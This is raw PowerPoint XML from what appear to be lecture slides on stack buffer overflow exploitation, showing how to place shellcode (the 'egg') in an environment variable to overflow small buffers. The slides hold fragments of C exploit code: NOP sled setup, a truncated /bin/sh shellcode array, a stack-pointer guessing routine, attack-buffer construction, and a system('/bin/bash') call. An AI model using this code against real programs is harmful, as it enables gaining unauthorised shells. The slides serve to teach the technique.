            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  memcpy(buff,"EGG=",4);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  putenv(buff);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  system("/bin/bash");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19371201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t>Delivering the “Egg”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="555011" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>% </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>create_egg</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>% </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>vulnerable_program</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> $EGG</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6963210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t>Overflowing Small Buffers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="568323" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>A buffer could be too small to contain the shell code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>If the program has access to the parent process environment </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Place the “egg” in an environment variable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Pass an overflowing string containing the address of the environment variable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Advantage: the “egg” can be as big as desired</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1544549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t>Creating the “Egg” in the Environment</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="572419" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>    #define OFFSET 0</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>/* Size of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>overlowing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> buffer */</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>#define BSIZE 612 /* &gt; 512 */</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>/* Size of the egg */</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>#define EGGSIZE 2048</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>/* No operation instruction */</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>#define NOP 0x90</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>[] = "\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>xeb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> ... /bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>sh</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Returns the stack pointer */</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>unsigned long </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>get_sp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(void) </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>{ __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>asm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>__("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>eax</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err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> main(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>, char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>[]) {</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  char *buff, *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>, *egg;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  long *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>addr_ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>,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int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>, offset=OFFSET;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>[1] != NULL) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>		offset = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>atoi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>[1]);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  /* Creates the attack buffer */</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  buff = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(BSIZE);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  /* Creates the egg */</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  egg = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(EGGSIZE);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="572420" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>/* Gets the stack pointer and subtract the offset.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>This is the address that will overwrite the legitimate return address */</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>get_sp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>() - offset;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printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>("Using address: 0x%x\n",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buff;</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addr_ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> = (long *) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>ptr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BSIZE; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
